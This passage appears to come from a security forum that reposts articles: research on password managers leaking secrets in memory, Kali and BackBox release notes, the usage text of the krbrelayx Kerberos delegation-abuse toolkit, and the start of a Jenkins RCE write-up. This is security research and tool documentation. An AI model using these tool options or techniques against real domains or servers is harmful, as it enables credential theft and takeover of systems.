encryption should be designed in such a way that, so long as the user did not use a trivial password, the attacker cannot brute force guess the master password in a reasonable amount of time using commonly available computing resources. Running: Unlocked State We define running in an “unlocked state” as cases where the password manager is running, and where the user has typed in the master password in order to decrypt and access the stored passwords inside the manager. The user may have displayed, copied to clipboard, or otherwise accessed some of the passwords in the password manager. In this “running, unlocked state” the password manager should guarantee: It should not be possible to extract the master password from memory, either directly or in any form that allows the original master password to be recovered. For those stored passwords that have not been displayed/copied/accessed by the user since the password manager was unlocked, it should not be possible to extract those unencrypted passwords from memory. Knowing usability constraints that affect password managers, we concede that: It may be possible to extract those passwords from memory that were displayed/copied/accessed in the current unlocked session. It may be possible to extract cryptographic information derived from the master password sufficient to decrypt other stored passwords, but not the master password itself. Running: Locked State We define “in locked state” as cases where (1) the password manager was just launched but the user has not entered the master password yet, or (2) the user previously entered the master password and used the password manager, but subsequently clicked the ‘Lock’ or ‘Log Out’ button. In this “running, locked state” the password manager should guarantee: All the security guarantees of a not-running password manager should apply to a password manager that is in the locked state. Since a locked password manager still exists as a process in virtual memory, this requires additional guarantees: It should not be possible to extract the master password from memory, either directly or in any form that allows the original master password to be recovered. It should not be possible to extract from memory any cryptographic information derived from the master password that might allow passwords to be decrypted without knowing the master password. It should not be possible to extract any unencrypted passwords from memory that are stored in the password manager. In addition to these explicit security guarantees, we expect password managers to incorporate additional hardening measures where possible, and to have these hardening measures enabled by default. For example, password managers should attempt to block software keystroke loggers from accessing the master password as it is typed, attempt to limit the exposure of unencrypted passwords left on the clipboard, and take reasonable steps to detect and block modification or patching of the password manager and its supporting libraries that might expose passwords. Scope: In this paper we will examine the inner workings as they relate to secrets retrieval and storage of 1Password, Dashlane, KeePass and LastPass on the Windows 10 platform (Version 1803 Build 17134.345) using an Intel i7-7700HQ processor. We examine susceptibility of a password manager to secrets exfiltration via examination of the password database on disk; memory forensics; and finally, keylogging, clipboard monitoring, and binary modification. Each password manager is examined in its default configuration after install with no advanced configuration steps performed. The focus on our evaluation of password managers is limited to the Windows platform. Our findings can be extrapolated to password manager implementations in other operating systems to guide research to areas of interest that are discussed in this paper. Target Password Managers: The following password managers with their corresponding versions were evaluated: Product Version 1Password4 for Windows 4.6.2.626 1Password7 for Windows 7.2.576 Dashlane for Windows 6.1843.0 KeePass Password Safe 2.40 LastPass for Applications 4.1.59 Security of Password Managers in the Non-Running State We first consider the security of password managers when they are not running. We focus on the attack vector of compromising passwords from disk. Unless password managers have severe vulnerabilities such as logging passwords to unencrypted log files or other egregious issues, the password managers’ defenses against the disk attack surface rest on the cryptography used to protect the password database. Here, we examine which algorithm each password manager uses to transform the master password into an encryption key, and whether the algorithm and number of iterations is severely lacking in its ability to resist contemporary cracking attacks. Table 2, below, outlines the key expansion algorithm type used and number of iterations in each password manager’s default configuration. With regard to key expansion recommendations set by NIST [14]we found that each key expansion algorithm used in the password managers was acceptable and that the number of iterations adequate. We concluded that the password managers were secure against compromising passwords from disk as the software is not running, and that brute forcing the encrypted password entries on disk would be computationally prohibitive, although not impossible if given enough computing resources. Given this, we moved on to the attack surface of passwords stored in memory while the password managers are running. Password Manager Key Expansion Algorithm Iterations 1Password4 PBKDF2-SHA256 40,000 [15] 1Password7 PBKDF2-SHA256 100,000 [16] Dashlane Argon2 3 [17] KeePass AES-KDF 60,000 [18] LastPass PBKDF2-SHA256 100,100 [19] Table 2. Each password managers default key expansion algorithm and number of iterations. Security of Password Managers in Running States We expected and found that all password managers reviewed sufficiently protect the master password and individual passwords while they are notrunning. The remaining bulk of our assessment of password managers in the running state was focused on the effectiveness of the locked state and whether the unlocked state left the minimum possible amount of sensitive information in memory. The following sections outline violations of our proposed security guarantees of password managers in a running locked and unlocked state. 1Password4 (Version: 4.6.2.626) We assessed the security of 1Password4 while running and found reasonable protections against exposure of individual passwords in the unlocked state; unfortunately, this was overshadowed by its handling of the master password and several broken implementation details when transitioning from the unlocked to the locked state. On the positive side, we found that as a user accesses different entries in 1Password4, the software is careful to clear the previous unencrypted password from memory before loading another. This means that only one unencrypted password can be in memory at once. On the negative side, the master password remains in memory when unlocked (albeit in obfuscated form) and the software fails to scrub the obfuscated password memory region sufficiently when transitioning from the unlocked to the locked state. We also found a bug where, under certain user actions, the master password can be left in memory in cleartext even while locked. Failure to Scrub Obfuscated Master Password from Memory It is possible to recover and deobfuscate the master password from 1Password4 since it is not scrubbed from memory after placing the password manager in a locked state. Given a scenario where a user has unlocked 1Password4 and then placed it back into a locked state, 1Password4 will prompt for the master password again as shown in Figure 1below. However, 1Password4 retains the master password in memory, although in an encoded/obfuscated format as shown in Figure 2. Figure 1. 1Password4 in a locked state awaiting master password input. Figure 2. Encoded master password present in memory while 1Password4 is in a locked state. We can use this information to intercept normal workflows in which 1Password4 calls RtlRunEncodeUnicodeString and RtlRunDecodeUnicodeString to obfuscate the master password to instead reveal the already present, but encoded master password into cleartext (Figure 3). Figure 3. Master password revealed after the expected RtlRunEncodeUnicodeString and RtlRunDecodeUnicodeString was reversed, thereby forcing 1Password4 to decode the encoded master password that was not scrubbed from memory. Copying the Current Password Entry from Memory Only entries that are actively being interacted with exist in memory as plaintext. Figure 4is an example of an entry in memory as its being interacted with. Once 1Password4 is locked, the memory region is deallocated . Note that the deallocated region is not first scrubbed, however the Windows memory manager will zero out any freed pages of memory before making them available for re-allocation by the Windows memory manager. Figure 4. Password entry in memory during active interaction. 1Password7 (Version: 7.2.576) After assessing the legacy 1Password4, we moved on to 1Password7, the current release. Surprisingly, we found that it is less secure in the running state compared to 1Password4. 1Password7 decrypted all individual passwords in our test database as soon as it is unlocked and caches them in memory, unlike 1Password4 which kept only one entry at a time in memory. Compounding this, we found that 1Password7 scrubs neither the individual passwords, the master password, nor the secret key (an extra field introduced in 1Password6 that combines with the master password to derive the encryption key) from memory when transitioning from unlocked to locked. This renders the “lock” button ineffective; from the security standpoint, after unlocking and using 1Password7, the user must exit the software entirely in order to clear sensitive information from memory as locking should. It appears 1Password may have rewritten their software to produce 1Password7 without implementing secure memory management and secrets scrubbing workflows present in 1Password4 and abandoning the distinction between a ‘running unlocked’ and ‘running locked’ state in terms of secrets exposure. Interestingly, this is not the case. Prior marketing material for 1Password claimed [20]to feature Intel SGX technology. This technology protects secrets inside secure memory enclaves so that other processes and even higher privileged components (such as the kernel) cannot access them. Were SGX to be implemented correctly, 1Password7 would have been the most secure password manager in our research by far. Unfortunately, SGX was only supported as a beta feature in 1Password6 and early versions of 1Password7, and was dropped for later versions. This was only evident from gathering the details about it on a 1Password support forum [21]. Exposure of Cleartext Master Password, Secret Key and Entries in Memory As stated before, all secrets are exposed by 1Password7 when in an unlocked and locked state. To demonstrate the severity of this issue we created proof of concept code to read 1Password7’s memory address space to extract these items. The proof of concept applications ran in the existing user context (which was an ordinary non-administrative user). Show below is 1Password7 in a locked state, Figure 5(having previously been unlocked but then again locked) awaiting password entry to unlock it. Figure 5. 1Password7 in a locked state, having previously been open and then locked. Figure 6 illustrates the automated retrieval of the master password. Figure 6. Extracting the master password from a locked 1Password7 instance Figure 7 shows the extraction of the secret key that is needed along with the master password to unlock an encrypted database, and Figure 8shows the automated extraction of secret entries. Figure 7. Extracting the secret key from 1Password7 in a locked state. Figure 8. Extracting password entries from a locked instance of 1Password7. The memory “hygiene” of 1Password7 is so lacking, that it is possible for it to leak passwords from memory without an intentional attack at all. During our evaluation of 1Password7, we encountered a system stop error (kernel mode exception) on our Windows 10 workstation, from an unrelated hardware issue, that created a full memory debug dump to disk. While examining this memory dump file, we came across our secrets that 1Password7 held cleartext, in memory, in a locked state when the stop error occurred (Figure 9). Figure 9. Windows 10 crash dump file contained secrets 1Password7 held in memory in a locked state. For all password managers that leave secrets in memory, this creates a threat model where secrets may be extracted in a non-running state as a by-product of system activity and/or crash/debug log files. Moreover, some companies have a policy to image workstations that have had malware encounters as part of the incident response procedure. A user that happened to be running 1Password7 while this procedure was initiated should assume that all secrets have been compromis Dashlane (Version: 6.1843.0) In our Dashlane evaluation, we noted workflows that indicate focus was placed on concealing secrets in memory to reduce their likelihood of extraction. Also, unique to Dashlane, was the usage of memory/string and GUI management frameworks that prevented secrets from being passed around to various OS API’s that could expose them to eavesdropping by trivial malware. Similar to 1Password4, Dashlane exposes only the active entry a user is interacting with. So, at most, the last active entry is exposed in memory while Dashlane is in an unlocked and locked state. However, once a user updates any information in an entry, Dashlane exposes the entire database plaintext in memory and it remains there even after Dashlane is logged out of or ‘locked’. Exposure of Cleartext Entries in Memory Password entries in Dashlane are stored in an XML object. Upon interacting with any entry this XML object becomes exposed in cleartext and can be easily extracted in both locked and unlocked states. Figure 10, below, is an example of a portion of this XML data structure. Figure 10. Excerpt of a fully decrypted Dashlane XML password database in an unlocked and locked state. Knowing that this data structure exists in a locked state, we then created a proof of concept application to extract it from a locked instance of Dashlane. Figure 11, below, is a locked instance of Dashlane prompting for the master password to unlock it. Figure 11. Locked instance of Dashlane. In this locked state, we then run our proof of concept to extract all stored secrets (Figure 12). Figure 12. Extracting secrets from a locked instance of Dashlane. However, even though we are able to extract secrets from a locked state of Dashlane, the memory region they reside in has been dereferenced and freed. So, over time portions of the XML data structure may be overwritten. Throughout our examination, we noticed that secrets may reside for a few minutes. In some instances, we have observed them still resident in memory more than 24 hours. Dashlane is also unique compared to the other password managers in our examination in that it does not allow you to exit the process via GUI components, such as clicking the close program [x] in the upper right or pressing the ALT-F4 key combination. Doing so causes Dashlane to minimize into the task tray, leaving it susceptible to secrets extraction for extended periods of time. KeePass (Version: 2.40) Unlike the other password managers, KeePass is an open source project. Similar to 1Password4, KeePass decrypts entries as they are interacted with, however, they all remain in memory since they are not individually scrubbed after each interaction. The master password is scrubbed from memory and not recoverable. However, while KeePass attempts to keep secrets secure by scrubbing them from memory, there are obviously errors in these workflows as we have discovered that while even in a locked state, we were able to extract entries that had been interacted with. KeePass claims to use several defenses in depth memory protection mechanisms as stated in an excerpt from their site below (Figure 13). However, they acknowledge that these workflows may involve Windows OS API’s that may make copies of various memory buffers which may not be exposed to KeePass for scrubbing. Figure 13. KeePass statement on memory protection. Exposure of Cleartext Entries in Memory Entries that have been interacted with remain exposed in memory even after KeePass has been placed into a locked state. Figure 14, below, is an example of a locked instance of KeePass prompting for the master password before it can be unlocked. Figure 14. Locked instance of KeePass. Secrets are scattered in memory with no references. However, performing a simple strings dump from the process memory of KeePass reveals a list of entries that have been interacted with (Figure 15). Figure 15. List of entries from a locked instance of KeePass. Using the above information, we can then search for a username to an entry and locate its corresponding password field entry, in the below image (Figure16) we locate the bitcoin private key which was stored in the password field. Figure 16. Locating a bitcoin private key via its corresponding public key/username. The above methodology can be used to extract any entries that have been interacted with before placing KeePass into a locked state. LastPass (Version: 4.1.59) Similar to 1Password4, LastPass obfuscates the master password as its being typed into the unlock field. Once the decryption key has been derived from the master password, the master password is overwritten with the phrase “lastpass rocks” (Figure17). Figure 17. Master password overwritten once the master password has been used in a PBKDF2 key expansion routine. Once LastPass enters an unlocked state, database entries are decrypted into memory only upon user interaction. However, these entries persist in memory even after LastPass has been placed back into a locked state. Exposure of Cleartext Master Password and Entries in Memory During a workflow to derive the decryption key, the master password is leaked into a string buffer in memory and never scrubbed, even when LastPass is placed into a locked state. The below image, Figure 18, is an instance of LastPass in a locked state awaiting user entry of the master password. Figure 18. Locked instance of LastPass. In this locked state, we can recover the master password and any interacted with password entries with the same methodology used in KeePass, in which a simple strings dump was performed on the active process. The image below, Figure19, is an example of recovering the master password, in a locked state, which ironically is always found within a few lines of ‘lastpass rocks’, the phrase used to conceal the master password in another buffer. Figure 19. Master password in cleartext (underlined red) typically within a few lines of ‘lastpass rocks’. Strings encapsulated by a ‘<input hwnd=’ tag will allow us to enumerate all secret entries that have been interacted with. Below, Figure 20, is an example of extracting a private key to a bitcoin wallet. Figure 20. Extracting a bitcoin private key from a locked instance of LastPass. Conclusion: All password managers we examined sufficiently secured user secrets while in a ‘not running’ state. That is, if a password database were to be extracted from disk and if a strong master password was used, then brute forcing of a password manager would be computationally prohibitive. Each password manager also attempted to scrub secrets from memory. But residual buffers remained that contained secrets, most likely due to memory leaks, lost memory references, or complex GUI frameworks which do not expose internal memory management mechanisms to sanitize secrets. This was most evident in 1Password7 where secrets, including the master password and its associated secret key, were present in both a locked and unlocked state. This is in contrast to 1Password4, where at most, a single entry is exposed in a ‘running unlocked’ state and the master password exists in memory in an obfuscated form, but is easily recoverable. If 1Password4 scrubbed the master password memory region upon successful unlocking, it would comply with all proposed security guarantees we outlined earlier. This paper is not meant to criticize specific password manager implementations; however, it is to establish a reasonable minimum baseline which all password managers should comply with. It is evident that attempts are made to scrub and sensitive memory in all password managers. However, each password manager fails in implementing proper secrets sanitization for various reasons. The image below, Figure 21, summarizes the results of our evaluation: Figure 21. Summary of each password managers security items we examined. Keylogging and Clipboard sniffing are known risks and only included for user awareness, that no matter how closely a password manager may adhere to our proposed ‘Security Guarantees’, victims of keylogging or clipboard sniffing malware/methods have no protection. However, significant violations of our proposed security guarantees are highlighted in red. In an unlocked state, all or a majority of secret records should not be extracted into memory. Only a single one, being actively viewed, should be extracted. Also, in an unlocked state, the master password should not be present in either an encrypted or obfuscated form. A locked running state that exposes interacted with or all records puts users’ secret records unnecessarily at risk. Most egregious is the presence of a master password in a locked state. It is unknown how widespread this knowledge is amongst adversaries. However, up to 60 million users of these password managers potentially are at risk of a targeted attack directed at the software that is meant to safeguard their secrets. In our opinion, the most urgent item is to sanitize secrets when a password manager is placed into a locked state. Typically, most password managers place themselves into this locked state after a certain period of user inactivity, after this the process may remain indefinitely either until the OS is restarted, the process is terminated by the user, or the process restarts itself as part of a self-update workflow when a new version is published. This creates a large window of time in which secrets for certain password managers reside cleartext in memory and available for extraction. In addition to providing a minimum set of guarantees users can rely on, creators of password managers should employ additional defenses to protect secrets by: Detecting or employing methods to, by default, thwart software based keyloggers Preventing secrets exposure in an unlocked state Employing hardware-based features (such as SGX) to make it more difficult to extract secrets Employing trivial malware and runtime process modification detection mechanisms Employing per-install binary scrambling during the install phase to make each instance a unique binary layout to thwart trivial and advanced targeted malware Limiting the traversal of secrets to OS provided APIs by implementing custom GUI elements and memory management to limit secrets exposure to well-known APIs that can be targeted by malware authors End users should, as always, employ security best practices to limit exposure to adversarial activity, such as: Keeping the OS updated Enabling or utilizing well known and tested anti-virus solutions Utilizing features provided by some password managers, such as “Secure Desktop” Using hardware wallets for immediately exploitable sensitive data such as crypto currency private keys Utilizing the auto lock feature of their OS to prevent ‘walk by’ targeted malicious activity Selecting a strong password as the master password to thwart brute force possibilities on a compromised encrypted database file Using full disk encryption to prevent the possibility of secrets extraction in the event of crash logs and associated memory dumps which may include decrypted password manager data Shutting a password manager down completely when not in use even in a locked state (If using one that doesn’t properly sanitize secrets upon being placed into a locked running state) Future Research: Password managers are an important and increasingly necessary part of our lives. In our opinion, users should expect that their secrets are safeguarded according to a minimum set of standards that we outlined as ‘security guarantees’. Initially our assumption and expectation were that password managers are designed to safeguard secrets in a ‘non-running state’, which we identified as true. However, we were surprised in the inconsistency in secrets sanitization and retention in memory when in a running unlocked state and, more importantly, when placed into a locked state. If password managers fail to sanitize secrets in a locked running state then this will be the low hanging fruit, that provides the path of least resistance, to successful compromise of a password manager running on a user’s workstation. Once the minimum set of ‘security guarantees’ is met then password managers should be re-evaluated to discover new attack vectors that adversaries may use to compromise password managers and examine possible mitigations for them. References: [1] "1Password," [Online]. Available: https://1password.com. [2] "Dashlane," [Online]. Available: https://www.dashlane.com/. [3] "KeePass," [Online]. Available: https://keepass.info/. [4] "LastPass," [Online]. Available: https://www.lastpass.com/. [5] T. Hunt. [Online]. Available: https://www.troyhunt.com/password-managers-dont-have-to-be-perfect-they-just-have-to-be-better-than-not-having-one/. [6] "https://twitter.com/roustem," [Online]. [7] "https://blog.dashlane.com/10-million-users/," [Online]. [8] "https://keepass.info/help/kb/trust.html," [Online]. [9] "https://www.lastpass.com/," [Online]. [10] D. Florencio, C. Herley and P. C. v. Oorschot, "An Administrator’s Guide to Internet Password Research," [Online]. Available: https://www.microsoft.com/en-us/research/wp-content/uploads/2014/11/WhatsaSysadminToDo.pdf. [11] T. L. Bras, "Online Overload – It’s Worse Than You Thought," [Online]. Available: https://blog.dashlane.com/infographic-online-overload-its-worse-than-you-thought/. [12] "Smart Taylor," [Online]. Available: https://smarttaylor.io/. [13] Taylor. [Online]. Available: https://medium.com/smarttaylor/updates-on-the-taylor-hack-incident-8843238d1670. [14] [Online]. Available: http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-132.pdf. [15] [Online]. Available: https://support.1password.com/pbkdf2/. [16] "https://support.1password.com/pbkdf2/," [Online]. [17] "https://www.dashlane.com/download/Dashlane_SecurityWhitePaper_October2018.pdf," [Online]. [18] "https://keepass.info/help/base/security.html," [Online]. [19] "LastPass," [Online]. Available: https://blog.lastpass.com/2018/07/lastpass-bugcrowd-update.html/. [20] J. Goldberg, "Using Intel’s SGX to keep secrets even safer," [Online]. Available: https://blog.1password.com/using-intels-sgx-to-keep-secrets-even-safer/. [21] "1Password support forum," [Online]. Available: https://discussions.agilebits.com/discussion/87834/intel-sgx-stopped-working-its-working-but-the-option-is-not-in-yet. Sursa: https://www.securityevaluators.com/casestudies/password-manager-hacking/ -
Kali Linux 2019.1 Released — Operating System For Hackers February 18, 2019Swati Khandelwal Wohooo! Great news for hackers and penetration testers. Offensive Security has just released Kali Linux 2019.1, the first 2019 version of its Swiss army knife for cybersecurity professionals. The latest version of Kali Linux operating system includes kernel up to version 4.19.13 and patches for numerous bugs, along with many updated software, like Metasploit, theHarvester, DBeaver, and more. Kali Linux 2019.1 comes with the latest version of Metasploit (version 5.0) penetration testing tool, which "includes database and automation APIs, new evasion capabilities, and usability improvements throughout," making it more efficient platform for penetration testers. Metasploit version 5.0 is the software's first major release since version 4.0 which came out in 2011. Talking about ARM images, Kali Linux 2019.1 has now once again added support for Banana Pi and Banana Pro that are on kernel version 4.19. "Veyron has been moved to a 4.19 kernel, and the Raspberry Pi images have been simplified, so it is easier to figure out which one to use," Kali Linux project maintainers says in their official release announcement. "There are no longer separate Raspberry Pi images for users with TFT LCDs because we now include re4son's kalipi-tft-config script on all of them, so if you want to set up a board with a TFT, run 'kalipi-tft-config' and follow the prompts." The Offensive Security virtual machine and ARM images have also been updated to the latest 2019.1 version. You can download new Kali Linux ISOs directly from the official website or from the Torrent network, and if you are already using it, then you can simply upgrade it to the latest and greatest Kali release by running the command: apt update && apt -y full-upgrade. Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group. Sursa: https://thehackernews.com/2019/02/kali-linux-hackers-os.html
-
- 1
-
-
BackBox Linux 5.3 released! February 18, 2019/in Releases / The BackBox Team is pleased to announce the updated release of BackBox Linux, the version 5.3. In this release we have fixed some minor bugs, updated the kernel stack, base system and hacking tools. What’s new Updated Linux Kernel 4.15 Updated hacking tools Updated ISO Hybrid with UEFI support System requirements 32-bit or 64-bit processor 1024 MB of system memory (RAM) 10 GB of disk space for installation Graphics card capable of 800×600 resolution DVD-ROM drive or USB port (3 GB) The ISO images for both 32bit & 64bit can be downloaded from the official web site download section: https://www.backbox.org/download Sursa: https://blog.backbox.org/2019/02/18/backbox-linux-5-3-released/
-
Krbrelayx - Unconstrained delegation abuse toolkit Toolkit for abusing unconstrained delegation. Requires impacket and ldap3 to function. It is recommended to install impacket from git directly to have the latest version available. More info about this toolkit available in my blog https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/ Tools included addspn.py This tool can add/remove/modify Service Principal Names on accounts in AD over LDAP. usage: addspn.py [-h] [-u USERNAME] [-p PASSWORD] [-t TARGET] -s SPN [-r] [-q] [-a] HOSTNAME Add an SPN to a user/computer account Required options: HOSTNAME Hostname/ip or ldap://host:port connection string to connect to Main options: -h, --help show this help message and exit -u USERNAME, --user USERNAME DOMAIN\username for authentication -p PASSWORD, --password PASSWORD Password or LM:NTLM hash, will prompt if not specified -t TARGET, --target TARGET Computername or username to target (FQDN or COMPUTER$ name, if unspecified user with -u is target) -s SPN, --spn SPN servicePrincipalName to add (for example: http/host.domain.local or cifs/host.domain.local) -r, --remove Remove the SPN instead of add it -q, --query Show the current target SPNs instead of modifying anything -a, --additional Add the SPN via the msDS-AdditionalDnsHostName attribute dnstool.py Add/modify/delete Active Directory Integrated DNS records via LDAP. usage: dnstool.py [-h] [-u USERNAME] [-p PASSWORD] [--forest] [--zone ZONE] [--print-zones] [-r TARGETRECORD] [-a {add,modify,query,remove,ldapdelete}] [-t {A}] [-d RECORDDATA] [--allow-multiple] [--ttl TTL] HOSTNAME Query/modify DNS records for Active Directory integrated DNS via LDAP Required options: HOSTNAME Hostname/ip or ldap://host:port connection string to connect to Main options: -h, --help show this help message and exit -u USERNAME, --user USERNAME DOMAIN\username for authentication. -p PASSWORD, --password PASSWORD Password or LM:NTLM hash, will prompt if not specified --forest Search the ForestDnsZones instead of DomainDnsZones --zone ZONE Zone to search in (if different than the current domain) --print-zones Only query all zones on the DNS server, no other modifications are made Record options: -r TARGETRECORD, --record TARGETRECORD Record to target (FQDN) -a {add,modify,query,remove,ldapdelete}, --action {add,modify,query,remove,ldapdelete} Action to perform. Options: add (add a new record), modify (modify an existing record), query (show existing), remove (mark record for cleanup from DNS cache), delete (delete from LDAP). Default: query -t {A}, --type {A} Record type to add (Currently only A records supported) -d RECORDDATA, --data RECORDDATA Record data (IP address) --allow-multiple Allow multiple A records for the same name --ttl TTL TTL for record (default: 180) printerbug.py Simple tool to trigger SpoolService bug via RPC backconnect. Similar to dementor.py. Thanks to @agsolino for implementing these RPC calls. usage: printerbug.py [-h] [-target-file file] [-port [destination port]] [-hashes LMHASH:NTHASH] [-no-pass] target attackerhost positional arguments: target [[domain/]username[:password]@]<targetName or address> attackerhost hostname to connect to optional arguments: -h, --help show this help message and exit connection: -target-file file Use the targets in the specified file instead of the one on the command line (you must still specify something as target name) -port [destination port] Destination port to connect to SMB Server authentication: -hashes LMHASH:NTHASH NTLM hashes, format is LMHASH:NTHASH -no-pass don't ask for password (useful when proxying through ntlmrelayx) krbrelayx.py Given an account with unconstrained delegation privileges, dump Kerberos TGT's of users connecting to hosts similar to ntlmrelayx. usage: krbrelayx.py [-h] [-debug] [-t TARGET] [-tf TARGETSFILE] [-w] [-ip INTERFACE_IP] [-r SMBSERVER] [-l LOOTDIR] [-f {ccache,kirbi}] [-codec CODEC] [-no-smb2support] [-wh WPAD_HOST] [-wa WPAD_AUTH_NUM] [-6] [-p PASSWORD] [-hp HEXPASSWORD] [-s USERNAME] [-hashes LMHASH:NTHASH] [-aesKey hex key] [-dc-ip ip address] [-e FILE] [-c COMMAND] [--enum-local-admins] [--no-dump] [--no-da] [--no-acl] [--no-validate-privs] [--escalate-user ESCALATE_USER] Kerberos "relay" tool. Abuses accounts with unconstrained delegation to pwn things. Main options: -h, --help show this help message and exit -debug Turn DEBUG output ON -t TARGET, --target TARGET Target to attack, since this is Kerberos, only HOSTNAMES are valid. Example: smb://server:445 If unspecified, will store tickets for later use. -tf TARGETSFILE File that contains targets by hostname or full URL, one per line -w Watch the target file for changes and update target list automatically (only valid with -tf) -ip INTERFACE_IP, --interface-ip INTERFACE_IP IP address of interface to bind SMB and HTTP servers -r SMBSERVER Redirect HTTP requests to a file:// path on SMBSERVER -l LOOTDIR, --lootdir LOOTDIR Loot directory in which gathered loot (TGTs or dumps) will be stored (default: current directory). -f {ccache,kirbi}, --format {ccache,kirbi} Format to store tickets in. Valid: ccache (Impacket) or kirbi (Mimikatz format) default: ccache -codec CODEC Sets encoding used (codec) from the target's output (default "ascii"). If errors are detected, run chcp.com at the target, map the result with https://docs.python.org/2.4/lib/standard- encodings.html and then execute ntlmrelayx.py again with -codec and the corresponding codec -no-smb2support Disable SMB2 Support -wh WPAD_HOST, --wpad-host WPAD_HOST Enable serving a WPAD file for Proxy Authentication attack, setting the proxy host to the one supplied. -wa WPAD_AUTH_NUM, --wpad-auth-num WPAD_AUTH_NUM Prompt for authentication N times for clients without MS16-077 installed before serving a WPAD file. -6, --ipv6 Listen on both IPv6 and IPv4 Kerberos Keys (of your account with unconstrained delegation): -p PASSWORD, --krbpass PASSWORD Account password -hp HEXPASSWORD, --krbhexpass HEXPASSWORD Hex-encoded password -s USERNAME, --krbsalt USERNAME Case sensitive (!) salt. Used to calculate Kerberos keys.Only required if specifying password instead of keys. -hashes LMHASH:NTHASH NTLM hashes, format is LMHASH:NTHASH -aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits) -dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter SMB attack options: -e FILE File to execute on the target system. If not specified, hashes will be dumped (secretsdump.py must be in the same directory) -c COMMAND Command to execute on target system. If not specified, hashes will be dumped (secretsdump.py must be in the same directory). --enum-local-admins If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary) LDAP attack options: --no-dump Do not attempt to dump LDAP information --no-da Do not attempt to add a Domain Admin --no-acl Disable ACL attacks --no-validate-privs Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks --escalate-user ESCALATE_USER Escalate privileges of this user instead of creating a new one TODO: Specifying SMB as target is not yet complete, it's recommended to run in export mode and then use secretsdump with -k Conversion tool from/to ccache/kirbi SMB1 support in the SMB relay server Sursa: https://github.com/dirkjanm/krbrelayx
-
Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE! This is also a cross-post blog from DEVCORE, this post is in English, 而這裡是中文版本! --- Hello everyone! This is the Hacking Jenkins series part two! For those people who still have not read the part one yet, you can check following link to get some basis and see how vulnerable Jenkins’ dynamic routing is! Hacking Jenkins Part 1 - Play with Dynamic Routing As the previous article said, in order to utilize the vulnerability, we want to find a code execution can be chained with the ACL bypass vulnerability to a well-deserved pre-auth remote code execution! But, I failed. Due to the feature of dynamic routing, Jenkins checks the permission again before most dangerous invocations(Such as the Script Console)! Although we could bypass the first ACL, we still can’t do much things After Jenkins released the Security Advisory and fixed the dynamic routing vulnerability on 2018-12-05, I started to organize my notes in order to write this Hacking Jenkins series. While reviewing notes, I found another exploitation way on a gadget that I failed to exploit before! Therefore, the part two is the story for that! This is also one of my favorite exploits and is really worth reading Vulnerability Analysis First, we start from the Jenkins Pipeline to explain CVE-2019-1003000! Generally the reason why people choose Jenkins is that Jenkins provides a powerful Pipeline feature, which makes writing scripts for software building, testing and delivering easier! You can imagine Pipeline is just a powerful language to manipulate the Jenkins(In fact, Pipeline is a DSL built with Groovy) In order to check whether the syntax of user-supplied scripts is correct or not, Jenkins provides an interface for developers! Just think about if you are the developer, how will you implement this syntax-error-checking function? You can just write an AST(Abstract Syntax Tree) parser by yourself, but it’s too tough. So the easiest way is to reuse existing function and library! As we mentioned before, Pipeline is just a DSL built with Groovy, so Pipeline must follow the Groovy syntax! If the Groovy parser can deal with the Pipeline script without errors, the syntax must be correct! The code fragments here shows how Jenkins validates the Pipeline: public JSON doCheckScriptCompile(@QueryParameter String value) { try { CpsGroovyShell trusted = new CpsGroovyShellFactory(null).forTrusted().build(); new CpsGroovyShellFactory(null).withParent(trusted).build().getClassLoader().parseClass(value); } catch (CompilationFailedException x) { return JSONArray.fromObject(CpsFlowDefinitionValidator.toCheckStatus(x).toArray()); } return CpsFlowDefinitionValidator.CheckStatus.SUCCESS.asJSON(); // Approval requirements are managed by regular stapler form validation (via doCheckScript) } Here Jenkins validates the Pipeline with the method GroovyClassLoader.parseClass(…)! It should be noted that this is just an AST parsing. Without running execute() method, any dangerous invocation won’t be executed! If you try to parse the following Groovy script, you get nothing this.class.classLoader.parseClass(''' print java.lang.Runtime.getRuntime().exec("id") '''); From the view of developers, the Pipeline can control Jenkins, so it must be dangerous and requires a strict permission check before every Pipeline invocation! However, this is just a simple syntax validation so the permission check here is more less than usual! Without any execute() method, it’s just an AST parser and must be safe! This is what I thought when the first time I saw this validation. However, while I was writing the technique blog, Meta-Programming flashed into my mind! What is Meta-Programming Meta-Programming is a kind of programming concept! The idea of Meta-Programming is providing an abstract layer for programmers to consider the program in a different way, and makes the program more flexible and efficient! There is no clear definition of Meta-Programming. In general, both processing the program by itself and writing programs that operate on other programs(compiler, interpreter or preprocessor…) are Meta-Programming! The philosophy here is very profound and could even be a big subject on Programming Language! If it is still hard to understand, you can just regard eval(...) as another Meta-Programming, which lets you operate the program on the fly. Although it’s a little bit inaccurate, it’s still a good metaphor for understanding! In software engineering, there are also lots of techniques related to Meta-Programming. For example: C Macro C++ Template Java Annotation Ruby (Ruby is a Meta-Programming friendly language, even there are books for that) DSL(Domain Specific Languages, such as Sinatra and Gradle) When we are talking about Meta-Programming, we classify it into (1)compile-time and (2)run-time Meta-Programming according to the scope. Today, we focus on the compile-time Meta-Programming! P.S. It’s hard to explain Meta-Programming in non-native language. If you are interested, here are some materials! Wiki, Ref1, Ref2 P.S. I am not a programming language master, if there is anything incorrect or inaccurate, please forgive me <(_ _)> How to Exploit? From the previous section we know Jenkins validates Pipeline by parseClass(…) and learn that Meta-Programming can poke the parser during compile-time! Compiling(or parsing) is a hard work with lots of tough things and hidden features. So, the idea is, is there any side effect we can leverage? There are many simple cases which have proved Meta-Programming can make the program vulnerable, such as he macro expansion in C language: #define a 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 #define b a,a,a,a,a,a,a,a,a,a,a,a,a,a,a,a #define c b,b,b,b,b,b,b,b,b,b,b,b,b,b,b,b #define d c,c,c,c,c,c,c,c,c,c,c,c,c,c,c,c #define e d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d #define f e,e,e,e,e,e,e,e,e,e,e,e,e,e,e,e __int128 x[]={f,f,f,f,f,f,f,f}; or the compiler resource bomb(make a 16GB ELF by just 18 bytes): int main[-1u]={1}; or calculating the Fibonacci 